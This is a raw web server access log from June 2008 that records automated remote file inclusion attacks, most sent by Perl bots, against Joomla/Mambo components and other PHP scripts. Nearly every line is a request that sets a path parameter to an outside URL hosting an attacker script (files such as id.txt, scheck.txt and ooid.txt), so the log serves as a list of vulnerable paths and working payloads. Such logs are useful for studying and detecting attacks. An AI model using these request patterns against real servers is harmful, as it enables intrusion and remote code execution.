64.106.202.240 - - [29/Jun/2008:18:18:18 -0600] "GET //?mosConfig_absolute_path=http://210.60.110.116/board/id.txt?? HTTP/1.1" 200 698 "-" "libwww-perl/5.79"
64.106.202.240 - - [29/Jun/2008:18:18:18 -0600] "GET /logs//?mosConfig_absolute_path=http://210.60.110.116/board/id.txt?? HTTP/1.1" 200 4297 "-" "libwww-perl/5.79"
89.108.66.182 - - [29/Jun/2008:18:18:29 -0600] "GET /logs/error_log.20080518//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.wailiat.com/nuke//modules/4nAlbum/album/test1.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
89.108.66.182 - - [29/Jun/2008:18:18:38 -0600] "GET /logs/error_log.20080518//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.wailiat.com/nuke//modules/4nAlbum/album/test1.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
64.106.202.240 - - [29/Jun/2008:18:18:42 -0600] "GET /logs/error_log.20080608//?mosConfig_absolute_path=http://210.60.110.116/board/id.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
201.130.79.28 - - [29/Jun/2008:18:19:15 -0600] "GET /logs/access_log//errors.php?error=http://www.delta.helloweb.eu/ateam.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
201.130.79.28 - - [29/Jun/2008:18:19:15 -0600] "GET //errors.php?error=http://www.delta.helloweb.eu/ateam.txt? HTTP/1.1" 404 229 "-" "libwww-perl/5.65"
201.130.79.28 - - [29/Jun/2008:18:19:15 -0600] "GET /logs//errors.php?error=http://www.delta.helloweb.eu/ateam.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
80.24.52.96 - - [29/Jun/2008:18:19:54 -0600] "GET /logs/access_log.20080608//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 298 "-" "libwww-perl/5.803"
80.24.52.96 - - [29/Jun/2008:18:19:54 -0600] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 273 "-" "libwww-perl/5.803"
80.24.52.96 - - [29/Jun/2008:18:19:55 -0600] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 278 "-" "libwww-perl/5.803"
204.15.135.98 - - [29/Jun/2008:18:20:00 -0600] "GET /logs/access_log.20080420//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://antoniodirenzo.altervista.org/ooid.txt?? HTTP/1.1" 404 273 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
89.108.66.182 - - [29/Jun/2008:18:20:00 -0600] "GET /logs/error_log.20080427/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.wailiat.com/nuke//modules/4nAlbum/album/test1.txt? HTTP/1.1" 404 280 "-" "libwww-perl/5.805"
204.15.135.98 - - [29/Jun/2008:18:20:00 -0600] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://antoniodirenzo.altervista.org/ooid.txt?? HTTP/1.1" 404 248 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
89.108.66.182 - - [29/Jun/2008:18:20:01 -0600] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.wailiat.com/nuke//modules/4nAlbum/album/test1.txt? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
89.108.66.182 - - [29/Jun/2008:18:20:02 -0600] "GET /logs/error_log.20080427/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.wailiat.com/nuke//modules/4nAlbum/album/test1.txt? HTTP/1.1" 404 280 "-" "libwww-perl/5.805"
89.108.66.182 - - [29/Jun/2008:18:20:05 -0600] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.wailiat.com/nuke//modules/4nAlbum/album/test1.txt? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
204.15.135.98 - - [29/Jun/2008:18:21:00 -0600] "GET /logs/access_log.20080420//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://antoniodirenzo.altervista.org/ooid.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.810"
204.15.135.98 - - [29/Jun/2008:18:21:01 -0600] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://antoniodirenzo.altervista.org/ooid.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.810"
204.15.135.98 - - [29/Jun/2008:18:21:01 -0600] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://antoniodirenzo.altervista.org/ooid.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.810"
189.56.104.251 - - [29/Jun/2008:18:21:10 -0600] "GET /logs/access_log.20080504/pagina.php?type=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 241 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
189.56.104.251 - - [29/Jun/2008:18:21:11 -0600] "GET /pagina.php?type=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 228 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
189.56.104.251 - - [29/Jun/2008:18:21:22 -0600] "GET /pagina.php?type=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
189.56.104.251 - - [29/Jun/2008:18:21:24 -0600] "GET /logs/access_log.20080504/pagina.php?type=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
189.56.104.251 - - [29/Jun/2008:18:21:24 -0600] "GET /pagina.php?type=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
189.56.104.251 - - [29/Jun/2008:18:21:24 -0600] "GET /logs/pagina.php?type=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
89.108.66.182 - - [29/Jun/2008:18:22:01 -0600] "GET /logs/access_log.20080427/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.wailiat.com/nuke//modules/4nAlbum/album/test1.txt? HTTP/1.1" 404 281 "-" "libwww-perl/5.805"
89.108.66.182 - - [29/Jun/2008:18:22:01 -0600] "GET /logs/access_log.20080427/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.wailiat.com/nuke//modules/4nAlbum/album/test1.txt? HTTP/1.1" 404 281 "-" "libwww-perl/5.805"
85.227.142.237 - - [29/Jun/2008:18:22:18 -0600] "GET /logs/error_log.20080511//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
85.227.142.237 - - [29/Jun/2008:18:22:18 -0600] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 273 "-" "libwww-perl/5.808"
85.227.142.237 - - [29/Jun/2008:18:22:19 -0600] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 278 "-" "libwww-perl/5.808"
189.19.255.240 - - [29/Jun/2008:18:22:22 -0600] "GET /logs/access_log/default.php?page=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
189.19.255.240 - - [29/Jun/2008:18:22:22 -0600] "GET /default.php?page=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
189.19.255.240 - - [29/Jun/2008:18:22:23 -0600] "GET /logs/default.php?page=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
216.193.201.57 - - [29/Jun/2008:18:23:06 -0600] "GET /logs/error_log.20080420//includes/header.php?c_temp_path=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.75"
216.193.201.57 - - [29/Jun/2008:18:23:06 -0600] "GET /logs//includes/header.php?c_temp_path=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.75"
216.193.201.57 - - [29/Jun/2008:18:23:06 -0600] "GET /logs/access_log.20080420//includes/header.php?c_temp_path=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.75"
85.227.142.237 - - [29/Jun/2008:18:25:06 -0600] "GET /logs/access_log.20080511//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 298 "-" "libwww-perl/5.808"
211.93.112.42 - - [29/Jun/2008:18:25:15 -0600] "GET /logs/access_log//?mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 223 "-" "libwww-perl/5.65"
211.93.112.42 - - [29/Jun/2008:18:25:15 -0600] "GET //?mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 200 698 "-" "libwww-perl/5.65"
211.93.112.42 - - [29/Jun/2008:18:25:16 -0600] "GET /logs//?mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 200 4297 "-" "libwww-perl/5.65"
64.38.4.3 - - [29/Jun/2008:18:25:23 -0600] "GET /index.php?option=com_simpleboard&task=&Itemid=&mosConfig_absolute_path=http://www.wir-sind-pankow.de/test.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
64.38.4.3 - - [29/Jun/2008:18:25:23 -0600] "GET /logs/index.php?option=com_simpleboard&task=&Itemid=&mosConfig_absolute_path=http://www.wir-sind-pankow.de/test.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
80.82.215.11 - - [29/Jun/2008:18:25:32 -0600] "GET /logs/access_log.20080420//modules/vwar/admin/admin.php?vwar_root=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
80.82.215.11 - - [29/Jun/2008:18:25:32 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
80.82.215.11 - - [29/Jun/2008:18:25:32 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
89.188.110.30 - - [29/Jun/2008:18:27:06 -0600] "GET /logs/access_log.20080420//modules/vwar/admin/admin.php?vwar_root=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
89.188.110.30 - - [29/Jun/2008:18:27:06 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
89.188.110.30 - - [29/Jun/2008:18:27:06 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
77.74.196.90 - - [29/Jun/2008:18:27:40 -0600] "GET /logs/error_log.20080420///Neos_Chronos/header.php?base_folder=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 255 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
77.74.196.90 - - [29/Jun/2008:18:27:40 -0600] "GET ///Neos_Chronos/header.php?base_folder=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 231 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
77.74.196.90 - - [29/Jun/2008:18:27:44 -0600] "GET /logs/access_log.20080420///Neos_Chronos/header.php?base_folder=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 256 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
77.74.196.90 - - [29/Jun/2008:18:28:31 -0600] "GET /logs/error_log.20080420///Neos_Chronos/header.php?base_folder=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.811"
77.74.196.90 - - [29/Jun/2008:18:28:31 -0600] "GET ///Neos_Chronos/header.php?base_folder=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.811"
77.74.196.90 - - [29/Jun/2008:18:28:31 -0600] "GET /logs///Neos_Chronos/header.php?base_folder=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.811"
193.202.88.113 - - [29/Jun/2008:18:28:33 -0600] "GET /logs/error_log.20080420///Neos_Chronos/header.php?base_folder=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 255 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
193.202.88.113 - - [29/Jun/2008:18:28:34 -0600] "GET ///Neos_Chronos/header.php?base_folder=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 231 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
77.74.196.90 - - [29/Jun/2008:18:28:36 -0600] "GET /logs/access_log.20080420///Neos_Chronos/header.php?base_folder=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.811"
89.188.110.30 - - [29/Jun/2008:18:28:36 -0600] "GET /logs/error_log.20080420///Neos_Chronos/header.php?base_folder=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 255 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
89.188.110.30 - - [29/Jun/2008:18:28:36 -0600] "GET ///Neos_Chronos/header.php?base_folder=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 231 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
89.188.110.30 - - [29/Jun/2008:18:28:41 -0600] "GET /logs/access_log.20080420///Neos_Chronos/header.php?base_folder=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 256 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
193.202.88.113 - - [29/Jun/2008:18:28:45 -0600] "GET /logs/access_log.20080420///Neos_Chronos/header.php?base_folder=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 256 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
89.188.110.30 - - [29/Jun/2008:18:28:48 -0600] "GET /logs/error_log.20080420///Neos_Chronos/header.php?base_folder=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
89.188.110.30 - - [29/Jun/2008:18:28:48 -0600] "GET ///Neos_Chronos/header.php?base_folder=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
89.188.110.30 - - [29/Jun/2008:18:28:49 -0600] "GET /logs///Neos_Chronos/header.php?base_folder=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
69.72.211.242 - - [29/Jun/2008:18:28:54 -0600] "GET /logs/access_log/index.php?site=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 231 "-" "libwww-perl/5.811"
69.72.211.242 - - [29/Jun/2008:18:28:54 -0600] "GET /index.php?site=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 227 "-" "libwww-perl/5.811"
69.72.211.242 - - [29/Jun/2008:18:28:54 -0600] "GET /logs/index.php?site=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 232 "-" "libwww-perl/5.811"
89.188.110.30 - - [29/Jun/2008:18:28:55 -0600] "GET /logs/access_log.20080420///Neos_Chronos/header.php?base_folder=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
217.20.163.130 - - [29/Jun/2008:18:28:59 -0600] "GET /logs/error_log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 263 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
217.20.163.130 - - [29/Jun/2008:18:28:59 -0600] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 248 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
193.202.88.113 - - [29/Jun/2008:18:29:02 -0600] "GET /logs/error_log.20080420///Neos_Chronos/header.php?base_folder=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.811"
193.202.88.113 - - [29/Jun/2008:18:29:02 -0600] "GET ///Neos_Chronos/header.php?base_folder=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.811"
193.202.88.113 - - [29/Jun/2008:18:29:02 -0600] "GET /logs///Neos_Chronos/header.php?base_folder=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.811"
67.18.241.90 - - [29/Jun/2008:18:29:05 -0600] "GET /logs/error_log//include/lib.inc.php?site_path=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 241 "-" "libwww-perl/5.812"
67.18.241.90 - - [29/Jun/2008:18:29:05 -0600] "GET //include/lib.inc.php?site_path=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 226 "-" "libwww-perl/5.812"
67.18.241.90 - - [29/Jun/2008:18:29:05 -0600] "GET /logs//include/lib.inc.php?site_path=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 231 "-" "libwww-perl/5.812"
193.202.88.113 - - [29/Jun/2008:18:29:10 -0600] "GET /logs/access_log.20080420///Neos_Chronos/header.php?base_folder=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.811"
77.74.196.90 - - [29/Jun/2008:18:29:58 -0600] "GET ///Neos_Chronos/header.php?base_folder=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.811"
189.19.255.240 - - [29/Jun/2008:18:30:04 -0600] "GET //trans/trans.php?trans=ko&page=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
189.19.255.240 - - [29/Jun/2008:18:30:08 -0600] "GET /logs//trans/trans.php?trans=ko&page=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
89.188.110.30 - - [29/Jun/2008:18:30:50 -0600] "GET ///Neos_Chronos/header.php?base_folder=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
193.202.88.113 - - [29/Jun/2008:18:31:00 -0600] "GET ///Neos_Chronos/header.php?base_folder=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.811"
216.12.200.84 - - [29/Jun/2008:18:31:01 -0600] "GET /logs/access_log.20080420/errors.php?error=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.63"
216.12.200.84 - - [29/Jun/2008:18:31:01 -0600] "GET /errors.php?error=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.63"
217.20.163.130 - - [29/Jun/2008:18:31:01 -0600] "GET /logs/error_log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.65"
216.12.200.84 - - [29/Jun/2008:18:31:01 -0600] "GET /logs/errors.php?error=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.63"
217.20.163.130 - - [29/Jun/2008:18:31:02 -0600] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.65"
217.20.163.130 - - [29/Jun/2008:18:31:02 -0600] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.65"
209.250.234.226 - - [29/Jun/2008:18:31:03 -0600] "GET /logs/access_log.20080420/errors.php?error=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.811"
209.250.234.226 - - [29/Jun/2008:18:31:03 -0600] "GET /errors.php?error=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.811"
209.250.234.226 - - [29/Jun/2008:18:31:03 -0600] "GET /logs/errors.php?error=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.811"
209.250.234.226 - - [29/Jun/2008:18:31:06 -0600] "GET /logs/access_log.20080420//?mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.811"
209.250.234.226 - - [29/Jun/2008:18:31:06 -0600] "GET //?mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 200 698 "-" "libwww-perl/5.811"
209.250.234.226 - - [29/Jun/2008:18:31:06 -0600] "GET /logs//?mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 200 4297 "-" "libwww-perl/5.811"
216.12.200.84 - - [29/Jun/2008:18:31:08 -0600] "GET /logs/access_log.20080420//?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.63"
216.12.200.84 - - [29/Jun/2008:18:31:08 -0600] "GET //?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 698 "-" "libwww-perl/5.63"
216.12.200.84 - - [29/Jun/2008:18:31:09 -0600] "GET /logs//?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 4297 "-" "libwww-perl/5.63"
201.6.118.215 - - [29/Jun/2008:18:31:10 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://eskent.fileave/idnews.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
201.6.118.215 - - [29/Jun/2008:18:31:11 -0600] "GET //include/admin.lib.inc.php?site_path=http://eskent.fileave/idnews.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
216.118.97.213 - - [29/Jun/2008:18:31:18 -0600] "GET /logs/access_log.20080420//?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.810"
216.118.97.213 - - [29/Jun/2008:18:31:18 -0600] "GET //?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 698 "-" "libwww-perl/5.810"
216.118.97.213 - - [29/Jun/2008:18:31:18 -0600] "GET /logs//?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 4297 "-" "libwww-perl/5.810"
209.35.191.113 - - [29/Jun/2008:18:31:24 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.wisdomteachers.com/audioblog/flashaudio/07feb/blid.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.64"
67.18.241.90 - - [29/Jun/2008:18:31:27 -0600] "GET /logs/access_log//include/lib.inc.php?site_path=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 242 "-" "libwww-perl/5.812"
204.15.135.98 - - [29/Jun/2008:18:31:29 -0600] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://antoniodirenzo.altervista.org/ooid.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.810"
80.82.215.11 - - [29/Jun/2008:18:31:36 -0600] "GET /logs/access_log//errors.php?error=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
80.82.215.11 - - [29/Jun/2008:18:31:36 -0600] "GET //errors.php?error=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
80.82.215.11 - - [29/Jun/2008:18:31:36 -0600] "GET /logs//errors.php?error=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
200.6.155.114 - - [29/Jun/2008:18:31:47 -0600] "GET /logs/access_log.20080420//?mosConfig_absolute_path=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 232 "-" "libwww-perl/5.810"
74.6.18.217 - - [29/Jun/2008:18:31:51 -0600] "GET /logs/access_log.20080413 HTTP/1.0" 200 6694940 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
204.15.135.98 - - [29/Jun/2008:18:31:52 -0600] "GET /logs/access_log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://antoniodirenzo.altervista.org/ooid.txt?? HTTP/1.1" 404 264 "-" "libwww-perl/5.810"
74.6.18.217 - - [29/Jun/2008:18:32:56 -0600] "GET /logs/error_log HTTP/1.0" 200 50214 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
216.12.200.84 - - [29/Jun/2008:18:33:21 -0600] "GET /logs/access_log.20080420//modules/vwar/admin/admin.php?vwar_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.63"
216.12.200.84 - - [29/Jun/2008:18:33:21 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.63"
216.12.200.84 - - [29/Jun/2008:18:33:21 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.63"
67.18.151.242 - - [29/Jun/2008:18:33:28 -0600] "GET /logs/access_log.20080413//administrator/components/com_akobook/akobook.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 280 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
67.18.151.242 - - [29/Jun/2008:18:33:28 -0600] "GET //administrator/components/com_akobook/akobook.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 255 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
209.250.234.226 - - [29/Jun/2008:18:33:48 -0600] "GET /logs/access_log.20080420//modules/vwar/admin/admin.php?vwar_root=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.811"
209.250.234.226 - - [29/Jun/2008:18:33:48 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
209.250.234.226 - - [29/Jun/2008:18:33:48 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.811"
205.234.215.105 - - [29/Jun/2008:18:33:51 -0600] "GET /logs/access_log.20080330//administrator/components/com_akobook/akobook.php?mosConfig_absolute_path=http://www.cinaoggi.it//NmBMailer.txt?? HTTP/1.1" 404 280 "-" "libwww-perl/5.811"
205.234.215.105 - - [29/Jun/2008:18:33:52 -0600] "GET //administrator/components/com_akobook/akobook.php?mosConfig_absolute_path=http://www.cinaoggi.it//NmBMailer.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.811"
205.234.215.105 - - [29/Jun/2008:18:33:52 -0600] "GET /logs//administrator/components/com_akobook/akobook.php?mosConfig_absolute_path=http://www.cinaoggi.it//NmBMailer.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.811"
205.234.215.105 - - [29/Jun/2008:18:33:55 -0600] "GET /logs/access_log.20080330//administrator/components/com_akobook/akobook.php?mosConfig_absolute_path=http://www.cinaoggi.it//NmBMailer.txt?? HTTP/1.1" 404 280 "-" "libwww-perl/5.811"
205.234.215.105 - - [29/Jun/2008:18:33:55 -0600] "GET //administrator/components/com_akobook/akobook.php?mosConfig_absolute_path=http://www.cinaoggi.it//NmBMailer.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.811"
